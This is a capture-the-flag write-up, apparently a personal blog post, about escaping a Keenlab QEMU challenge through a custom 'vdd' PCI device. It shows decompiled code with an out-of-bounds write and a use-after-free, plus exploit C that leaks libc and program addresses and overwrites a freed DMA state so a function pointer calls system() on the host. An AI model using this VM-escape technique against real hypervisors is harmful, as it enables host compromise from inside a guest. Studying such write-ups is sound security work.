It’s a great challenge to get familiar with QEMU escape. We are going to exploit QEMU via a custom vulnerable device.

You should read VM escape - QEMU Case Study before reading this writeup.

Challenge

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
challenge
├── dependency
│   ├── libnettle.so.6.2
│   └── usr
│   └── local
│   └── share
│   └── qemu
│   ├── bios-256k.bin
│   ├── efi-e1000.rom
│   ├── kvmvapic.bin
│   ├── linuxboot_dma.bin
│   └── vgabios-stdvga.bin
├── launch.sh
├── qemu-system-x86_64
├── rootfs.cpio
└── vmlinuz-4.8.0-52-generic

There is a qemu-system-x86_64 binary with a launch script, a linux kernel, a initramfs and some dependencies.

We can get an interactive shell by executing launch.sh.

1
2
3
4
5
6
7
8
9
10
11
__ __ _____________ __ __ ___ ____
/ //_// ____/ ____/ | / / / / / | / __ )
/ ,< / __/ / __/ / |/ / / / / /| | / __ |
/ /| |/ /___/ /___/ /| / / /___/ ___ |/ /_/ /
/_/ |_/_____/_____/_/ |_/ /_____/_/ |_/_____/
Welcome to Tencent Keenlab
Tencent login: root
# uname -r
4.8.0-52-generic
#

The custom vulnerable device

luanch.sh shows there are two custom device named vdd.

1
2
$ ./qemu-system-x86_64 -device help 2>&1 | grep VDD
name "VDD", bus PCI, desc "KeenLab virtualized Devices For Testing D"

we can use some commands to find these devices and their io port/memroy.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:05.0 Class 00ff: 1234:2333
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
# cat /proc/iomem
...
fe900000-fe9fffff : 0000:00:04.0
fea00000-feafffff : 0000:00:05.0
...
# cat /proc/ioports
...
c000-c0ff : 0000:00:04.0
c100-c1ff : 0000:00:05.0
...

OOBW

In vdd_mmio_write, there is a out-of-bound write vulnerability which copys QEMU heap memory to guset physical memory when we set dma_len larger than sizeof(dam_buf).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
int64_t v4; // rax@21
if ( opaque->dma_state )
{
...
else
{
switch ( addr )
{
...
case 32uLL:
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len); // OOB write
break;
...
}
}
}
}

UAF

Also in vdd_mmio_write, if addr == 128 and opaque->sr[129] & 1 != 0, we can set a timer which will execute vdd_dma_timer after opaque->expire_time ns.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
int64_t v4; // rax@21
if ( opaque->dma_state )
{
...
else if ( addr > 0x24 )
{
if ( addr == 128 )
{
if ( opaque->sr[129] & 1 )
{
v4 = qemu_clock_get_ns(0);
timer_mod(&opaque->dma_timer, v4 + opaque->expire_time);
}
}
...
}
}

In vdd_dma_timer, it invokes opaque->dma_state->phys_mem_read/write.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
if ( opaque->dma_state->cmd )
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
else
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
if ( opaque->dma_state->cmd == 1 )
vdd_raise_irq(opaque, 0x100u);
}

If pci_vdd_uninit is invoked before vdd_dma_timer, the dma_state will be used after free.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void __fastcall pci_vdd_uninit(TencentPCIState *opaque)
{
__int64 v1; // rax@5
__int64 v2; // [rsp+28h] [rbp-8h]@1
v2 = *MK_FP(__FS__, 40LL);
memset(opaque->sr, 0, 0x100uLL);
if ( opaque->dma_state )
{
memset(opaque->dma_state, 0, 0x330uLL);
g_free((rcu_head *)opaque->dma_state);
}
if ( opaque->buf )
g_free((rcu_head *)opaque->buf);
v1 = *MK_FP(__FS__, 40LL) ^ v2;
}

Exploitation

The exploitation is divided into two steps:

  1. leak QEMU program address.
  2. hijack control flow

Leak QEMU program address

First, we allocate a buffer and get it’s physical address. Then we set dma_state->dst to our buffer and set dma_len larger than sizeof(dma_buf). Finally, we trigger phys_mem_write by writel(0, piomem + 32). By searching the output, we can find libc addresses and program addresses then calculate the base address of program/libc.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void phys_mem_write(unsigned int dst, unsigned int len)
{
set_dmastate_dst(dst);
set_dmalen(len);
writel(0, piomem + 32);
}
void mem_leak(void)
{
pbuf = (unsigned long)kmalloc(0x10000, GFP_KERNEL);
memset(pbuf, 0, 0x10000);
phys_mem_write(virt_to_phys(pbuf), 0x1000);
// xxd(pbuf, 0x1000);
libc_base = search_libc_addr(pbuf, 0x1000);
printk("libc base:0x%lx\n", libc_base);
prog_base = search_prog_addr(pbuf, 0x1000);
printk("program base:0x%lx\n", prog_base);
system_addr = prog_base + SYSTEM_OFFSET;
printk("system addr:0x%lx\n", system_addr);
}

Control RIP

There are three steps to exploit the use-after-free vulnerability:

  1. set a timer
  2. trigger pci_vdd_uninit
  3. reallocte and rewrite dma_state

The following command can trigger pci_vdd_uninit

1
echo 0 > /sys/bus/pci/slots/4/power

When vdd_dma_timer runs, we can control rip.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
if ( opaque->dma_state->cmd )
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
else
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
if ( opaque->dma_state->cmd == 1 )
vdd_raise_irq(opaque, 0x100u);
}

Becasue the QEMU is launched with --nographic -append 'console=ttyS0', so we can simply invoke system(cmd) to run a command in host machine and the output will show in console.

To invoke system(cmd), We need to:

  1. set opaque->dma_state->phys_mem_read to system
  2. set opaque->dma_buf to cmd
  3. make sure opaque->dma_state->cmd != 0.

In vdd_linear_write, when addr == 0, a buffer will be allocated with size of opaque->dma_len. And the data in opaque->dma_state->src with length of opaque->dma_len will be copied to opaque->buf, then copied to opaque->dma_state->dst

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void __fastcall vdd_linear_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
if ( opaque->dma_state && addr <= 13 )
{
switch ( (_DWORD)((char *)off_6EF324 + off_6EF324[addr]) )
{
case 0:
if ( opaque->buf )
g_free((rcu_head *)opaque->buf);
opaque->buf = (uint8_t *)g_malloc0(opaque->dma_len);
vdd_dma_read(opaque->buf, opaque->dma_state->src, opaque->dma_len);
vdd_dma_write(opaque->buf, opaque->dma_state->dst, opaque->dma_len);
break;
...
}
}
}
1
2
3
4
5
6
7
8
9
10
11
void put_fake_dma(void)
{
struct dma fakedma;
fakedma.cmd = 2;
fakedma.phys_mem_read = system_addr;
memcpy(pbuf, (void *)&fakedma, sizeof(fakedma));
set_dmalen(0x330);
set_dmastate_src(virt_to_phys(pbuf));
set_dmastate_dst(virt_to_phys(pbuf));
outb(0, VDB_PORT + 0);
}

Exploit script

Thanks for Atum’s help.

Comment and share

  • page 1 of 1
Author's picture

Eadom

NO PWN NO FUN


@Alibaba


Hangzhou